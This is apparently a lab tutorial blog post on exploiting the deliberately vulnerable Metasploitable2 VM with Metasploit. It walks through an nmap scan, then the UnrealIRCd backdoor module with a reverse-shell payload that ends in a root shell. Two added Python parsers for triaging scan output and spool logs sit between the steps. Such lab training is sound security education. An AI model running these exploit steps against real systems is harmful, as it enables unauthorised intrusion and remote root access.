By: @vinea
March 14, 2016

METASPLOIT/METASPLOITABLE2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools. After the virtual machine boots, log in to the console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address. For the VM to get an address on your LAN, its network adapter must be configured in bridged mode.

    eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1
              inet addr:192.168.1.4  Bcast:192.168.1.255  Mask:255.255.255.0

So in my case the IP address of the target is 192.168.1.4.

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner.

Let's get to it. To open Metasploit, run the command: msfconsole

I receive the following:

    cowsay++
     ____________
     ------------
           ,__,
           (oo)____
           (__)    )
              ||--|| *

           =[ metasploit v4.11.15-dev-8697798                   ]
    + -- --=[ 1523 exploits - 887 auxiliary - 260 post          ]
    + -- --=[ 436 payloads - 38 encoders - 8 nops               ]
    + -- --=[ Free Metasploit Pro trial: https://r-7.co/trymsp ]

    msf >

Whenever you start up Metasploit there is a cute little banner, sometimes an animal saying "metasploit" or asteroids-based ASCII art. Regardless of what you see there, the important stuff is below it: Metasploit prints its version, including core and API version, how many exploit, auxiliary and post modules it has loaded, and how many payloads and encoders. From here we can start to enter commands.

Let's look at help:

    msf > help

    Core Commands
    =============

        Command       Description
        -------       -----------
        ?             Help menu
        advanced      Displays advanced options for one or more modules
        back          Move back from the current context
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
        edit          Edit the current module with $VISUAL or $EDITOR
        exit          Exit the console
        get           Gets the value of a context-specific variable
        getg          Gets the value of a global variable
        grep          Grep the output of another command
        help          Help menu
        info          Displays information about one or more modules
        irb           Drop into irb scripting mode
        jobs          Displays and manages jobs
        kill          Kill a job
        load          Load a framework plugin
        loadpath      Searches for and loads modules from a path
        makerc        Save commands entered since start to a file
        options       Displays global options or for one or more modules
        popm          Pops the latest module off the stack and makes it active
        previous      Sets the previously loaded module as the current module
        pushm         Pushes the active or list of modules onto the module stack
        quit          Exit the console
        reload_all    Reloads all modules from all defined module paths
        rename_job    Rename a job
        resource      Run the commands stored in a file
        route         Route traffic through a session
        save          Saves the active datastores
        search        Searches module names and descriptions
        sessions      Dump session listings and display information about sessions
        set           Sets a context-specific variable to a value
        setg          Sets a global variable to a value
        show          Displays modules of a given type, or all modules
        sleep         Do nothing for the specified number of seconds
        spool         Write console output into a file as well the screen
        threads       View and manipulate background threads
        unload        Unload a framework plugin
        unset         Unsets one or more context-specific variables
        unsetg        Unsets one or more global variables
        use           Selects a module by name
        version       Show the framework and console library version numbers

    Database Backend Commands
    =========================

        Command           Description
        -------           -----------
        creds             List all credentials in the database
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        db_nmap           Executes nmap and records the output automatically
        db_rebuild_cache  Rebuilds the database-stored module cache
        db_status         Show the current database status
        hosts             List all hosts in the database
        loot              List all loot in the database
        notes             List all notes in the database
        services          List all services in the database
        vulns             List all vulnerabilities in the database
        workspace         Switch between database workspaces

So we can now see all options available to us. A shortcut for "help" is also a question mark ("?"). The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.

To start off a pentest, we need to find the machines on the network. Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration". To find all targets on our network, we would just run an nmap scan against our subnet. There are many different options for nmap, including host OS discovery, stealthy scans, traceroute, and many others.

Okay, now let's finally start exploiting this machine. As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can utilize the built-in database to save our nmap scans. Run this command to ensure that our database is connected:

    msf > db_status
    [*] postgresql connected to metasploit4
    msf > db_nmap
    [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
    msf >

If it spits out an error, then we need to connect our database. Now type:

    db_nmap -v -sS -A [ip-address]

-v is "verbose", which means it will output more information for us to the screen.
-sS is the "SYN" or "stealth" scan, which doesn't complete a full TCP connection to the host and is thus "stealthy". If you want to know more about this, check out the nmap man page or other documentation. -A is an all-encompassing option which includes operating system detection, version detection (like the -sV option), script scanning, and traceroute.

    msf > db_nmap -v -sS -A 192.168.1.4
    [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-11 20:20 CET
    [*] Nmap: NSE: Loaded 132 scripts for scanning.
    [*] Nmap: NSE: Script Pre-scanning.
    [*] Nmap: Initiating NSE at 20:20
    [*] Nmap: Completed NSE at 20:20, 0.00s elapsed
    [*] Nmap: Initiating NSE at 20:20
    [*] Nmap: Completed NSE at 20:20, 0.03s elapsed
    [*] Nmap: Initiating ARP Ping Scan at 20:20
    [*] Nmap: Scanning 192.168.1.4 [1 port]
    [*] Nmap: Completed ARP Ping Scan at 20:20, 0.23s elapsed (1 total hosts)
    [*] Nmap: Initiating Parallel DNS resolution of 1 host. at 20:20
    [*] Nmap: Completed Parallel DNS resolution of 1 host. at 20:20, 0.03s elapsed
    [*] Nmap: Initiating SYN Stealth Scan at 20:20
    [*] Nmap: Scanning 192.168.1.4 [1000 ports]
    [*] Nmap: Discovered open port 53/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 3306/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 25/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 21/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 22/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 139/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 23/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 111/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 80/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 445/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 5900/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 1099/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 2121/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 513/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 514/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 512/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 6000/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 8009/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 6667/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 2049/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 8180/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 1524/tcp on 192.168.1.4
    [*] Nmap: Discovered open port 5432/tcp on 192.168.1.4
    [*] Nmap: Completed SYN Stealth Scan at 20:20, 2.85s elapsed (1000 total ports)
    [*] Nmap: Initiating Service scan at 20:20
    [*] Nmap: Scanning 23 services on 192.168.1.4
    [*] Nmap: Completed Service scan at 20:23, 136.29s elapsed (23 services on 1 host)
    [*] Nmap: Initiating OS detection (try #1) against 192.168.1.4
    [*] Nmap: NSE: Script scanning 192.168.1.4.
    [*] Nmap: Initiating NSE at 20:23
    [*] Nmap: Completed NSE at 20:26, 158.57s elapsed
    [*] Nmap: Initiating NSE at 20:26
    [*] Nmap: Completed NSE at 20:26, 0.16s elapsed
    [*] Nmap: Nmap scan report for 192.168.1.4
    [*] Nmap: Host is up (0.047s latency).
    [*] Nmap: Not shown: 977 closed ports
    [*] Nmap: PORT     STATE SERVICE     VERSION
    [*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
    [*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    [*] Nmap: | ssh-hostkey:
    [*] Nmap: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
    [*] Nmap: |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
    [*] Nmap: 23/tcp   open  telnet      Linux telnetd
    [*] Nmap: 25/tcp   open  smtp        Postfix smtpd
    [*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
    [*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
    [*] Nmap: | Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
    [*] Nmap: | Public Key type: rsa
    [*] Nmap: | Public Key bits: 1024
    [*] Nmap: | Signature Algorithm: sha1WithRSAEncryption
    [*] Nmap: | Not valid before: 2010-03-17T14:07:45
    [*] Nmap: | Not valid after:  2010-04-16T14:07:45
    [*] Nmap: | MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
    [*] Nmap: |_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
    [*] Nmap: |_ssl-date: 2016-03-11T19:23:22+00:00; -46s from scanner time.
    [*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
    [*] Nmap: | dns-nsid:
    [*] Nmap: |_  bind.version: 9.4.2
    [*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 (DAV/2)
    [*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
    [*] Nmap: | rpcinfo:
    [*] Nmap: |   program  version  port/proto  service
    [*] Nmap: |   100000   2          111/tcp   rpcbind
    [*] Nmap: |   100000   2          111/udp   rpcbind
    [*] Nmap: |   100003   2,3,4     2049/tcp   nfs
    [*] Nmap: |   100003   2,3,4     2049/udp   nfs
    [*] Nmap: |   100005   1,2,3    35875/udp   mountd
    [*] Nmap: |   100005   1,2,3    44512/tcp   mountd
    [*] Nmap: |   100021   1,3,4    50723/tcp   nlockmgr
    [*] Nmap: |   100021   1,3,4    54154/udp   nlockmgr
    [*] Nmap: |   100024   1        35197/udp   status
    [*] Nmap: |_  100024   1        47457/tcp   status
    [*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    [*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    [*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
    [*] Nmap: 513/tcp  open  login
    [*] Nmap: 514/tcp  open  tcpwrapped
    [*] Nmap: 1099/tcp open  rmiregistry GNU Classpath grmiregistry
    [*] Nmap: |_rmi-dumpregistry: Registry listing failed (No return data received from server)
    [*] Nmap: 1524/tcp open  shell       Metasploitable root shell
    [*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
    [*] Nmap: 2121/tcp open  ccproxy-ftp?
    [*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    [*] Nmap: | mysql-info:
    [*] Nmap: |   Protocol: 53
    [*] Nmap: |   Version: .0.51a-3ubuntu5
    [*] Nmap: |   Thread ID: 8
    [*] Nmap: |   Capabilities flags: 43564
    [*] Nmap: |   Some Capabilities: SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions
    [*] Nmap: |   Status: Autocommit
    [*] Nmap: |_  Salt: -6g${cZ|!+TFBVm?1x*c
    [*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    [*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
    [*] Nmap: | vnc-info:
    [*] Nmap: |   Protocol version: 3.3
    [*] Nmap: |   Security types:
    [*] Nmap: |_    Unknown security type (33554432)
    [*] Nmap: 6000/tcp open  X11         (access denied)
    [*] Nmap: 6667/tcp open  irc         Unreal ircd
    [*] Nmap: 8009/tcp open  ajp13?
    [*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    [*] Nmap: MAC Address: 08:00:27:02:3B:8E (Oracle VirtualBox virtual NIC)
    [*] Nmap: Device type: general purpose
    [*] Nmap: Running: Linux 2.6.X
    [*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
    [*] Nmap: OS details: Linux 2.6.9 - 2.6.33
    [*] Nmap: Uptime guess: 0.011 days (since Fri Mar 11 20:10:28 2016)
    [*] Nmap: Network Distance: 1 hop
    [*] Nmap: TCP Sequence Prediction: Difficulty=204 (Good luck!)
    [*] Nmap: IP ID Sequence Generation: All zeros
    [*] Nmap: Service Info: Hosts: metasploitable.localdomain, metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    [*] Nmap: Host script results:
    [*] Nmap: | nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)
    [*] Nmap: | Names:
    [*] Nmap: |   METASPLOITABLE       Flags:
    [*] Nmap: |   METASPLOITABLE       Flags:
    [*] Nmap: |   METASPLOITABLE       Flags:
    [*] Nmap: |   \x01\x02__MSBROWSE__\x02  Flags:
    [*] Nmap: |   WORKGROUP            Flags:
    [*] Nmap: |   WORKGROUP            Flags:
    [*] Nmap: |_  WORKGROUP            Flags:
    [*] Nmap: TRACEROUTE
    [*] Nmap: HOP RTT      ADDRESS
    [*] Nmap: 1   47.36 ms 192.168.1.4
    [*] Nmap: NSE: Script Post-scanning.
    [*] Nmap: Initiating NSE at 20:26
    [*] Nmap: Completed NSE at 20:26, 0.03s elapsed
    [*] Nmap: Initiating NSE at 20:26
    [*] Nmap: Completed NSE at 20:26, 0.00s elapsed
    [*] Nmap: Read data files from: /usr/bin/../share/nmap
    [*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 326.93 seconds
    [*] Nmap: Raw packets sent: 1104 (49.322KB) | Rcvd: 1102 (44.930KB)
    msf >

Once you run this, a whole lotta stuff should come out at you.
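What a defender does with the same scan output is turn it into an inventory and a list of findings: every cleartext or legacy listener above (telnet, the r-services on 512/513, the bare shell on 1524, VNC 3.3) is a finding on its own before any exploit is considered. The Python below is an added example, not code from the post or from Metasploit or nmap. It parses the "[*] Nmap:" port lines that msfconsole echoes (SAMPLE_SCAN is a constructed subset of the scan above, including some NSE detail lines the parser must skip) and annotates each open service against a small policy table. The POLICY entries and their wording are this example's own assumptions, not anything either tool reports.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a subset of the "[*] Nmap:" lines msfconsole echoed for
# the db_nmap run above, mixed with NSE detail lines the parser must ignore.
SAMPLE_SCAN = """\
[*] Nmap: Nmap scan report for 192.168.1.4
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: 6667/tcp open irc Unreal ircd
"""

# One port line: "<port>/<proto> <state> <service> [<version banner>]".
PORT_LINE = re.compile(
    r"^\[\*\] Nmap: (?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)"
    r"\s+(?P<name>\S+)(?:\s+(?P<info>.*))?$"
)

# Hypothetical policy table written for this example: services a reviewer
# flags on sight, with the reason that goes into the finding.
POLICY = {
    "telnet": "cleartext login protocol: credentials and session readable on the wire",
    "ftp":    "cleartext credentials unless FTPS or SFTP is enforced",
    "exec":   "r-service (rexecd) trusts the caller by host; replace with SSH",
    "login":  "r-service (rlogind) trusts the caller by host; replace with SSH",
    "shell":  "bare command shell listener; must never be network reachable",
    "vnc":    "VNC 3.x authentication is weak; keep it off the LAN or behind a tunnel",
    "x11":    "X11 reachable over the network; restrict with access control or a firewall",
}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    info: str = ""
    risks: list = field(default_factory=list)


def parse_db_nmap(text):
    """Return one Service per port line; NSE detail and banner lines are skipped."""
    services = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m is None:
            continue
        services.append(Service(int(m["port"]), m["proto"], m["state"],
                                m["name"].lower(), (m["info"] or "").strip()))
    return services


def triage(text):
    """Parse the scan and attach a policy finding to each open service that matches one."""
    services = parse_db_nmap(text)
    for svc in services:
        if svc.state != "open":
            continue
        reason = POLICY.get(svc.name)
        if reason:
            svc.risks.append(reason)
    return services


def summarize(services):
    """The two counts a reviewer wants at the top of the report."""
    open_svcs = [s for s in services if s.state == "open"]
    return {"open": len(open_svcs), "flagged": sum(1 for s in open_svcs if s.risks)}


if __name__ == "__main__":
    found = triage(SAMPLE_SCAN)
    print(summarize(found))
    for s in found:
        mark = "!!" if s.risks else "  "
        print(f"{mark} {s.port:>5}/{s.proto} {s.name:<12} {s.info}")
        for r in s.risks:
            print(f"        - {r}")
```

Run it on a file captured from msfconsole (the spool command in the help listing writes one) and the flagged rows are the remediation list; the unflagged rows with a version banner (ssh, mysql, irc) are the ones to check against vendor advisories next.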
Once the scan is done you might be confused by your results, but I'll show you how to easily determine your attack vector. When your database has hosts in it, you can display which ones it has tracked with the "hosts" command. Mine looks like this right now:

    msf > hosts

    Hosts
    =====

    address      mac                name  os_name  os_flavor  os_sp  purpose  info  comments
    -------      ---                ----  -------  ---------  -----  -------  ----  --------
    192.168.1.1  64:6e:ea:16:de:98        Linux    2.6.X             server
    192.168.1.2                           Linux    3.X               server
    192.168.1.4  08:00:27:02:3b:8e        Linux    2.6.X             server

Pretty cool, right? It has the IP, OS, flavor of OS, MAC, and more! If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.

But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing "services". This is my output after scanning the Metasploitable host:

    msf > services

    Services
    ========

    host         port  proto  name         state  info
    ----         ----  -----  ----         -----  ----
    192.168.1.4  2121  tcp    ccproxy-ftp  open   ProFTPD 1.3.1
    192.168.1.4  25    tcp    smtp         open   Postfix smtpd
    192.168.1.4  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
    192.168.1.4  53    tcp    domain       open   ISC BIND 9.4.2
    192.168.1.4  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
    192.168.1.4  6667  tcp    irc          open   Unreal ircd
    192.168.1.4  23    tcp    telnet       open   Linux telnetd
    192.168.1.4  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
    192.168.1.4  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
    192.168.1.4  2049  tcp    nfs          open   2-4 RPC#100003
    192.168.1.4  1524  tcp    shell        open   Metasploitable root shell
    192.168.1.4  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry
    192.168.1.4  514   tcp    tcpwrapped   open
    192.168.1.4  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
    192.168.1.4  111   tcp    rpcbind      open   2 RPC#100000
    192.168.1.4  513   tcp    login        open
    192.168.1.4  512   tcp    exec         open   netkit-rsh rexecd
    192.168.1.4  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
    192.168.1.4  5900  tcp    vnc          open   VNC protocol 3.3
    192.168.1.4  21    tcp    ftp          open   vsftpd 2.3.4
    192.168.1.4  6000  tcp    x11          open   access denied
    192.168.1.4  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP

Well, that is quite a bit more useful. We can see the IP of the host together with the port, protocol, and service in use. On top of that, since we had version detection on, it displays which version of each service is running.

We can see port 6667 is running Unreal ircd. Unreal is a server for IRC (Internet Relay Chat), and the "d" at the end of ircd stands for "daemon", which means it runs as a background service listening on that port.

Metasploit also has an awesome feature to find exploits, scanners, and other modules with the "search" command. We are going to run the following command to see if there are any modules for Unreal IRC:

    msf > search unreal

    Matching Modules
    ================

       Name                                        Disclosure Date  Rank       Description
       ----                                        ---------------  ----       -----------
       exploit/linux/games/ut2004_secure           2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Linux)
       exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
       exploit/windows/games/ut2004_secure         2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Win32)

To load a module in Metasploit, we use the "use" command followed by the name of the module:

    msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
    msf exploit(unreal_ircd_3281_backdoor) >

As we can see, our prompt has changed to show that we are using an exploit module, and its name. When using the "use" command, you can use tab completion: if you're stuck, hitting the tab key will either complete the name or, if tapped twice, display the candidates (if there are multiple).
Most Linux users know this since it is incredibly useful while moving through a file system or issuing commands quickly. Now that we have the module loaded, issuing the command "show options" will of course show us the possible options.

    msf exploit(unreal_ircd_3281_backdoor) > show options

    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  6667             yes       The target port

    Exploit target:

       Id  Name
       --  ----
       0   Automatic Target

There are only two options, and only one target, which is automatic since this module is for a single operating system. Both options are required, which means the exploit cannot be run without them. We can see the port is already set, since IRC servers normally run on port 6667, but if someone is hiding the service on a different port, this can be changed.

To set or change an option, issue the "set" command followed by the option you wish to change and finally the value you want to set, as follows:

    msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4
    RHOST => 192.168.1.4

Of course you would set RHOST to whatever the IP address of your exploitable machine is.

Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. "show payloads" lists the ones compatible with the loaded module; you can also use the "search" command followed by what you are looking for (e.g. unix shell).

    msf exploit(unreal_ircd_3281_backdoor) > show payloads

    Compatible Payloads
    ===================

       Name                                Disclosure Date  Rank    Description
       ----                                ---------------  ----    -----------
       cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
       cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
       cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
       cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
       cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
       cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

    msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4
    RHOST => 192.168.1.4
    msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse_ruby_ssl
    PAYLOAD => cmd/unix/reverse_ruby_ssl

Let's finally exploit this system! The exploit command has certain options, such as -j which runs it as a job, or -z which does not interact with the session after exploitation. These can be used in different ways. To view all of them, use the help command followed by the command you need help with (e.g. help exploit). Running our exploit results in this:

    msf exploit(unreal_ircd_3281_backdoor) > exploit -z

    [*] Started reverse SSL handler on 192.168.1.2:4444
    [*] 192.168.1.4:6667 - Connected to 192.168.1.4:6667...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    [*] 192.168.1.4:6667 - Sending backdoor command...
    [*] Exploit completed, but no session was created.

And in the end it does not work :(, but what can you do.. maybe I try a different exploit or payload.. :)

The output I was hoping for would look like this:

    msf exploit(unreal_ircd_3281_backdoor) > exploit -z

    [*] Started bind handler
    [*] Connected to 192.168.1.10:6667...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    [*] Sending backdoor command...
    [*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500
    [*] Session x created in the background.

We see some output, and most notably at the bottom "command shell session opened" and "session created in the background". If we didn't run this with the -z option and with no payload set, the following output would have been produced:

    msf exploit(unreal_ircd_3281_backdoor) > exploit

    [*] Started reverse double handler
    [*] Connected to 192.168.1.110:6667...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    [*] Sending backdoor command...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo aeuPuvLl90yRmhts;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "aeuPuvLl90yRmhts\r\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400

That's a lot of stuff, but it's pretty easy to understand. First it connects to the socket (an IP and port) and receives back the two NOTICE lines. After that, it sends the backdoor command and accepts two connections. Part of the exploit is echoing a random string, which is written to both sockets; the sockets are then read and whatever comes back is printed. Once the echo has been matched, a command shell is opened and labeled as "session 1".

Going back to our most recent exploit attempt, what we should have is a blank screen. Let's get back to what you should have done previously, since this is just another option in our exploitation phase. Keep in mind when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.

Now that we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is "sessions":

    msf exploit(unreal_ircd_3281_backdoor) > sessions

    Active sessions
    ===============

      Id  Type        Information  Connection
      --  ----        -----------  ----------
      x   shell unix               192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)

Of course the IP addresses will be different from yours since we do not have the exact same network, but it should display your exploited system's IP address. The Id is the number of the session you created, and it depends on how many sessions you have created so far.

Finally, to interact with this session, issue the following command:

    msf exploit(unreal_ircd_3281_backdoor) > sessions -i x
    [*] Starting interaction with x...

    pwd
    /etc/unreal
    whoami
    root
    id
    uid=0(root) gid=0(root)

So we can see: we interact with the session numbered x, which brings us to a command prompt on the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid.

So thank you for reading my first post on Cybrary 0P3N.
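Reading exploit output like the blocks above is also what an incident responder or report writer does after an engagement, usually from a console log saved with the spool command from the help listing, and the two outcomes to tell apart are exactly the ones the post shows: "Exploit completed, but no session was created." versus "Command shell session N opened (...)". The Python below is an added example, not part of the post or of Metasploit. It groups a spool file into exploit/run attempts and records, for each, which handler was started, whether a session was opened, and that session's id, endpoints and timestamp. SPOOL is a constructed log in the shape of the two runs above (the failed reverse SSL attempt and the hoped-for bind-handler result); the line formats it matches are only the ones visible on this page.

```python
import re
from datetime import datetime

# Constructed sample: the two exploit attempts from the post, in the shape they
# would have in a console log written with msfconsole's "spool" command.
SPOOL = """\
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(unreal_ircd_3281_backdoor) > exploit -z
[*] Started reverse SSL handler on 192.168.1.2:4444
[*] 192.168.1.4:6667 - Connected to 192.168.1.4:6667...
[*] 192.168.1.4:6667 - Sending backdoor command...
[*] Exploit completed, but no session was created.
msf exploit(unreal_ircd_3281_backdoor) > exploit -z
[*] Started bind handler
[*] Connected to 192.168.1.10:6667...
[*] Sending backdoor command...
[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500
[*] Session 3 created in the background.
"""

# Prompt line: "msf <kind>(<module>) > <command>".
PROMPT = re.compile(r"^msf\d* (?P<kind>\w+)\((?P<module>[^)]+)\) > (?P<cmd>.*)$")
# "[*] Started <handler> handler[ on <ip:port>]"
HANDLER = re.compile(r"^\[\*\] Started (?P<handler>.+?) handler(?: on (?P<listen>\S+))?$")
# "[*] <type> session <id> opened (<src> -> <dst>) at <timestamp>"
SESSION = re.compile(
    r"^\[\*\] (?P<type>.+?) session (?P<id>\d+) opened "
    r"\((?P<src>\S+) -> (?P<dst>\S+)\) at (?P<ts>.+)$"
)
NO_SESSION = "Exploit completed, but no session was created."


def parse_spool(text):
    """Split the log into exploit/run attempts and record each one's outcome."""
    runs, current = [], None
    for line in text.splitlines():
        line = line.rstrip()
        p = PROMPT.match(line)
        if p:
            # Any new prompt ends the previous attempt; only exploit/run start one.
            current = None
            if p["cmd"].split()[:1] in (["exploit"], ["run"]):
                current = {"module": p["module"], "command": p["cmd"],
                           "handler": None, "listen": None,
                           "outcome": "unknown", "session": None}
                runs.append(current)
            continue
        if current is None:
            continue  # output of set/show/etc. is not part of an attempt
        h = HANDLER.match(line)
        if h:
            current["handler"], current["listen"] = h["handler"], h["listen"]
            continue
        s = SESSION.match(line)
        if s:
            current["outcome"] = "session"
            current["session"] = {
                "id": int(s["id"]), "type": s["type"],
                "src": s["src"], "dst": s["dst"],
                "opened_at": datetime.strptime(s["ts"], "%Y-%m-%d %H:%M:%S %z"),
            }
            continue
        if NO_SESSION in line:
            current["outcome"] = "no_session"
    return runs


def sessions_timeline(runs):
    """Chronological (opened_at, session id, src, dst) tuples for the report."""
    opened = [r["session"] for r in runs if r["session"]]
    return sorted((s["opened_at"], s["id"], s["src"], s["dst"]) for s in opened)


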